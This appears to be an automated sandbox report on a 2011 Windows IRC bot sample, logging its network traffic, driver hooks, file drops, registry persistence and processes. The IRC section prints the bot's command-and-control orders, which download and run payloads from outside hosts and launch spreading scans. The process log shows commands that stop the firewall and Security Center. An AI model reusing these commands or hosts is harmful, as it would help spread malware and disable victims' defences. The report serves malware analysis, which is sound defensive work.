Sep 21, 2011 16:52:02.749776000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:02.962223000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:02.962236000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.076085000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.079830000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.079847000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.178116000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.182148000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.182163000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.327585000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.328357000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.328373000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.433393000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.439701000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.439720000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.452019000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.478634000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.558429000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.559728000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.559746000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.698736000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.699650000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.699665000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:03.832800000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:03.832811000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:04.051891000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:04.660286000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:04.772842000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:04.773560000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:04.773578000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:04.892778000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:04.893550000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:04.893564000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.042589000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.042604000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.254934000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.254947000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.316364000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.323004000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.323021000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.473013000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.473028000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.499768000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.500393000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.500408000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.578619000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.582315000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.582331000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.585733000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.648243000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.693415000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.695348000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.695364000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.701942000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.806214000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.853672000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.855529000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.855545000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.858378000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.896792000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.940492000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.941233000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.941247000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:05.942937000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:05.979251000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.027542000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.030638000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.030651000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.032943000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.189915000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.337456000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.339816000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.339830000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.341921000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.392873000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.439799000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.440559000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.440572000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.441909000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.479556000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.536464000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.537188000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.537202000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.540066000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.571118000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.612728000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.613791000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.613805000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.617038000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.707509000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.746995000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.747633000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.747647000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.750414000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.787909000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.825447000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.826083000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.826096000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.829252000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.863439000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.902586000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.903205000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.903217000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.903888000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:06.938473000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:06.996000000 CEST	16778	1122	58.240.104.57	192.168.0.10
Sep 21, 2011 16:52:07.001746000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:07.001762000 CEST	1122	16778	192.168.0.10	58.240.104.57
Sep 21, 2011 16:52:20.393163000 CEST	9040	1868	192.168.0.2	192.168.0.10
Sep 21, 2011 16:52:36.981990000 CEST	9040	2155	192.168.0.2	192.168.0.10
Sep 21, 2011 16:52:53.627095000 CEST	9040	2473	192.168.0.2	192.168.0.10

All UDP
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2011 16:51:43.867714000 CEST	50612	53	192.168.0.10	195.186.1.121
Sep 21, 2011 16:51:44.866200000 CEST	50612	53	192.168.0.10	195.186.4.121
Sep 21, 2011 16:51:45.188903000 CEST	53	50612	195.186.1.121	192.168.0.10
Sep 21, 2011 16:51:46.013048000 CEST	53	50612	195.186.4.121	192.168.0.10
Sep 21, 2011 16:51:47.709020000 CEST	50979	53	192.168.0.10	195.186.1.121
Sep 21, 2011 16:51:48.693421000 CEST	50979	53	192.168.0.10	195.186.4.121
Sep 21, 2011 16:51:49.694065000 CEST	50979	53	192.168.0.10	195.186.1.121
Sep 21, 2011 16:51:49.866146000 CEST	53	50979	195.186.1.121	192.168.0.10
Sep 21, 2011 16:51:53.316186000 CEST	53	50979	195.186.4.121	192.168.0.10
Sep 21, 2011 16:51:57.474316000 CEST	53	50979	195.186.1.121	192.168.0.10

All ICMP
Timestamp	Source IP	Dest IP
Sep 21, 2011 16:51:46.013952000 CEST	192.168.0.10	195.186.4.121
Sep 21, 2011 16:51:53.316668000 CEST	192.168.0.10	195.186.4.121
Sep 21, 2011 16:51:57.475265000 CEST	192.168.0.10	195.186.1.121

DNS
Timestamp	Source IP	Dest IP	Type	Data
Sep 21, 2011 16:51:43.867714000 CEST	192.168.0.10	195.186.1.121	query	checkip.dyndns.org: type A, class IN
Sep 21, 2011 16:51:44.866200000 CEST	192.168.0.10	195.186.4.121	query	checkip.dyndns.org: type A, class IN
Sep 21, 2011 16:51:45.188903000 CEST	195.186.1.121	192.168.0.10	answer	checkip.dyndns.org: type A, class IN
Sep 21, 2011 16:51:45.188903000 CEST	195.186.1.121	192.168.0.10	answer	checkip.dyndns.org: type A, class IN, addr 91.198.22.70
Sep 21, 2011 16:51:46.013048000 CEST	195.186.4.121	192.168.0.10	answer	checkip.dyndns.org: type A, class IN
Sep 21, 2011 16:51:46.013048000 CEST	195.186.4.121	192.168.0.10	answer	checkip.dyndns.org: type A, class IN, addr 91.198.22.70
Sep 21, 2011 16:51:47.709020000 CEST	192.168.0.10	195.186.1.121	query	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:48.693421000 CEST	192.168.0.10	195.186.4.121	query	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:49.694065000 CEST	192.168.0.10	195.186.1.121	query	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:49.866146000 CEST	195.186.1.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:49.866146000 CEST	195.186.1.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN, 53.159.185.81.rev.sfr.net
Sep 21, 2011 16:51:53.316186000 CEST	195.186.4.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:53.316186000 CEST	195.186.4.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN, 53.159.185.81.rev.sfr.net
Sep 21, 2011 16:51:57.474316000 CEST	195.186.1.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN
Sep 21, 2011 16:51:57.474316000 CEST	195.186.1.121	192.168.0.10	answer	53.159.185.81.in-addr.arpa: type PTR, class IN, 53.159.185.81.rev.sfr.net

HTTP
Timestamp	Source Port	Dest Port	Source IP	Dest IP	Host	Data	Raw
Sep 21, 2011 16:51:43.874105000 CEST	1122	16778	192.168.0.10	58.240.104.57	58.240.104.57:16778	GET /logo.gif HTTP/1.1	........'c....E...~.@.........:.h9.bA.h..jo...P...D...GET /logo.gif HTTP/1.1..User-Agent: Mozilla/4.0 (compatible)..Host: 58.240.104.57:16778....
Sep 21, 2011 16:51:45.206536000 CEST	1123	8245	192.168.0.10	91.198.22.70	checkip.dyndns.org:8245	GET / HTTP/1.1	........'c....E..r~.@...I.....[..F.c 5...\|p.snP.......GET / HTTP/1.1..Host: checkip.dyndns.org:8245..Cache-Control: no-cache....
Sep 21, 2011 16:51:47.272379000 CEST	16778	1122	58.240.104.57	192.168.0.10		HTTP/1.1 200 OK	..'c..........E...pL@.@.e.:.h9....A..bo...h...P...d...HTTP/1.1 200 OK..Content-Type: image/gif..Content-Length: 359808..Accept-Ranges: bytes..Set-Cookie: HFS_SID=0.164912080857903; path=/..Last-Modified: Thu,20 Apr 2006 11:51:50 GMT..Content-Disposition: filename="logo.gif";....
Sep 21, 2011 16:51:47.688406000 CEST	8245	1123	91.198.22.70	192.168.0.10		HTTP/1.1 200 OK	..'c..........E..,..@.@...[..F.... 5.cp.sn....P...3...HTTP/1.1 200 OK..Content-Type: text/html..Server: DynDNS-CheckIP/1.0..Connection: close..Cache-Control: no-cache..Pragma: no-cache..Content-Length: 105....<html><head><title>Current IP Check</title></head><body>CurrentIP Address: 81.185.159.53</body></html>..

IRC
Timestamp	Source Port	Dest Port	Source IP	Dest IP	Data	Raw
Sep 21, 2011 16:50:58.945843000 CEST	1120	8685	192.168.0.10	60.165.98.198	Nickname: USA\|XP\|SP3\|1\|61558946	........'c....E..Dv~@...$.....<.b..`!.FC.*E...P.... ..NICK USA\|XP\|SP3\|1\|61558946..
Sep 21, 2011 16:50:58.947678000 CEST	1120	8685	192.168.0.10	60.165.98.198	User: SP3-056	........'c....E..Kv.@...$.....<.b..`!.FC.FE...P...%<..USER SP3-056 * 0 :HANUELE-BC60720..
Sep 21, 2011 16:51:32.158361000 CEST	8685	1120	60.165.98.198	192.168.0.10	Joins channel: :#blue5..:...	..'c..........E....\|@.@..C<.b.....!..`E...FC..P...b*..:USA\|XP\|SP3\|1\|61558946!SP3-056@81.185.159.53 JOIN :#blue5..:..... 332 USA\|XP\|SP3\|1\|61558946 #blue5 :\|.ddosstop -s\|.stop -s\|.patcher http://58.240.104.57:16778/logo.gif 0 -s\|.shttp ftp://ccc:1@119.188.6.227:5809/tyf.jpglpdd.exe -s\|.asc svrsvc_XXX 1005 9999 1 -b -e -r -s\|.asc svrsvc_XXX 20 5 9999 0 -b -r -s\|.join#sd5 -s\|.cjoin 1 CHN #cn -s..:..... 333 USA\|XP\|SP3\|1\|61558946 #blue5 ccc 1312995191..:..... 353USA\|XP\|SP3\|1\|61558946 @ #blue5 :USA\|XP\|SP3\|1\|61558946 ..:..... 366 USA\|XP\|SP3\|1\|6155894

Hooks

IRP Handler
Handler Function	Driver	Address	Type
IRP_MJ_SET_VOLUME_INFORMATION	\Driver\IpNat	F87D5436	modified
IRP_MJ_QUERY_QUOTA	\Driver\IpNat	F87D5436	modified
IRP_MJ_CREATE_MAILSLOT	\Driver\IpNat	F87D5436	modified
IRP_MJ_POWER	\Driver\IpNat	F87D5436	modified
IRP_MJ_DEVICE_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_READ	\Driver\IpNat	F87D5436	modified
IRP_MJ_DIRECTORY_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_QUERY_VOLUME_INFORMATION	\Driver\IpNat	F87D5436	modified
IRP_MJ_SET_SECURITY	\Driver\IpNat	F87D5436	modified
IRP_MJ_WRITE	\Driver\IpNat	F87D5436	modified
IRP_MJ_LOCK_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_CLEANUP	\Driver\IpNat	F87D5436	modified
IRP_MJ_CLOSE	\Driver\IpNat	F87D5436	modified
IRP_MJ_INTERNAL_DEVICE_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_CREATE	\Driver\IpNat	F87D5436	modified
IRP_MJ_CREATE_NAMED_PIPE	\Driver\IpNat	F87D5436	modified
IRP_MJ_SET_INFORMATION	\Driver\IpNat	F87D5436	modified
IRP_MJ_DEVICE_CHANGE	\Driver\IpNat	F87D5436	modified
IRP_MJ_QUERY_EA	\Driver\IpNat	F87D5436	modified
IRP_MJ_FILE_SYSTEM_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_FLUSH_BUFFERS	\Driver\IpNat	F87D5436	modified
IRP_MJ_SET_EA	\Driver\IpNat	F87D5436	modified
IRP_MJ_SYSTEM_CONTROL	\Driver\IpNat	F87D5436	modified
IRP_MJ_QUERY_SECURITY	\Driver\IpNat	F87D5436	modified
IRP_MJ_SET_QUOTA	\Driver\IpNat	F87D5436	modified
IRP_MJ_QUERY_INFORMATION	\Driver\IpNat	F87D5436	modified
IRP_MJ_SHUTDOWN	\Driver\IpNat	F87D5436	modified

New Devices
Driver	Device	Attached to (lower)	Attached to (upper)
\Driver\IpNat	\Device\IPNAT

Analysis File: binary.exe PID: 808 Parent PID: 156

Sections

General
Start time:	07:41:10
Start date:	21/09/2011
Path:	C:\binary.exe
Commandline:	not known
Imagebase:	0x400000
File size:	50703 bytes
MD5 hash:	9C0930A84D40CF3E57600CCF15C82794

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\WINDOWSExplorer.exe	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	12F654	1	40B741

File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
c:\sdfeww.bat	read attributes and synchronize and generic write	none	synchronous io non alert and non directory file	success or wait	1	40B14A

File copied
Old File Path	New File Path	Completion	Count	Source Address
C:\binary.exe	C:\WINDOWS\system32\smsc.exe	success or wait	1	40B853

File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\sdfeww.bat	none	1350	40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1	40B171

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	320000	24576	own pid	readonly	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
C:\WINDOWS\system32\iphlpapi.dll	query and write and read and execute	image	76D60000	102400	own pid	read write	success or wait	1
\KnownDlls\WININET.dll	write and read and execute	image	3D930000	942080	own pid	read write	success or wait	1
\KnownDlls\Normaliz.dll	write and read and execute	image	330000	36864	own pid	read write	image not at base	1
\KnownDlls\Normaliz.dll	write and read and execute	image	330000	36864	own pid	read write	conflicting addresses	1
\KnownDlls\urlmon.dll	write and read and execute	image	78130000	1257472	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
\KnownDlls\iertutil.dll	write and read and execute	image	3DFD0000	2002944	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\mfc42.dll	query and write and read and execute	image	73DD0000	987136	own pid	read write	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	370000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	390000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	390000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_81920	write	image	BF0000	81920	own pid	read write	success or wait	1	87D83EC
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_32768	write	image	3F0000	32768	own pid	read write	success or wait	1	87D83EC
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768	write	image	C10000	32768	own pid	read write	success or wait	1	87D83EC
C:\WINDOWS\system32\icmp.dll	query and write and read and execute	image	74290000	16384	own pid	read write	success or wait	1	4095FB
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1	409765
C:\WINDOWS\system32\odbc32.dll	query and write and read and execute	image	74320000	249856	own pid	read write	success or wait	1	4098F6
\KnownDlls\comdlg32.dll	write and read and execute	image	763B0000	299008	own pid	read write	success or wait	1	4098F6
C:\WINDOWS\system32\odbcint.dll	write and read and execute	commit	D20000	94208	own pid	execute	success or wait	1	4098F6
C:\WINDOWS\system32\odbcint.dll	query and write and read and execute	image	D20000	94208	own pid	read write	image not at base	1	4098F6
C:\WINDOWS\system32\odbcint.dll	query and write and read and execute	image	D20000	94208	own pid	read write	conflicting addresses	1	4098F6
C:\WINDOWS\system32\psapi.dll	query and write and read and execute	image	76BF0000	45056	own pid	read write	success or wait	1	409994
\BaseNamedObjects\ShimSharedMemory	write	image	D40000	57344	own pid	read write	success or wait	1	40B100
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	D50000	126976	own pid	execute	success or wait	1	40B100
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	40B100
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	D50000	1208320	own pid	readonly	success or wait	1	40B100
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1	40B100
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	E80000	389120	own pid	execute	success or wait	2	40B100
C:\WINDOWS\system32\cmd.exe	query and read	commit	E80000	389120	own pid	readonly	success or wait	2	40B100
C:\WINDOWS\system32\cmd.exe	query and read	commit	D50000	389120	own pid	readonly	success or wait	1	40B100
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	D60000	1208320	own pid	readonly	success or wait	3	40B1C6
C:\sdfeww.bat	query and read	commit	D60000	4096	own pid	readonly	success or wait	1	40B1C6
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	E90000	389120	own pid	execute	success or wait	4	40B1F1
C:\WINDOWS\system32\cmd.exe	query and read	commit	E90000	389120	own pid	readonly	success or wait	4	40B1F1
C:\WINDOWS\system32\cmd.exe	query and read	commit	D60000	389120	own pid	readonly	success or wait	2	40B1F1
C:\binary.exe	query and write and read and execute and extend size	commit	D60000	53248	own pid	readonly	success or wait	1	40B853

Registry Activities:

Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions	systemdates	String	C:\binary.exe	success or wait	1	40AB29

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	Shell	success or wait	1	40A945

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1976	C:\WINDOWS\system32\cmd.exe	cmd /c net stop SharedAccess	0	success or wait	1	40B100
1188	C:\WINDOWS\system32\cmd.exe	cmd /c c:\sdfeww.bat	suspended	success or wait	1	40B1C6
1960	C:\WINDOWS\system32\cmd.exe	cmd /c net stop Security Center	0	success or wait	1	40B1F1
252	C:\WINDOWS\system32\cmd.exe	cmd /c net start SharedAccess	0	success or wait	1	40B20B

Process terminated
PID	Filepath	Completion	Count	Source Address
808	C:\binary.exe	success or wait	1	4076BA
808	C:\binary.exe	success or wait	0	4076BA

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
808	C:\binary.exe	3F0000	12FCF4	page read and write	success or wait	3	482435

Memory attributes changed
PID	Filepath	Base	Length	New Protection	Old Protection	Completion	Count	Source Address
808	C:\binary.exe	416600	1000	page execute and read and write	page read and write	success or wait	1	482992
808	C:\binary.exe	416000	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416614	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416228	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41622C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416230	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416234	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416238	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41623C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416240	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416244	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416248	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41624C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	416628	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416138	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41663C	1000	page execute and read and write	page execute and read and write	success or wait	1	482992
808	C:\binary.exe	416218	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
808	C:\binary.exe	41621C	1000	page execute and read and write	page execute and read and write	success or wait	1	482B1A
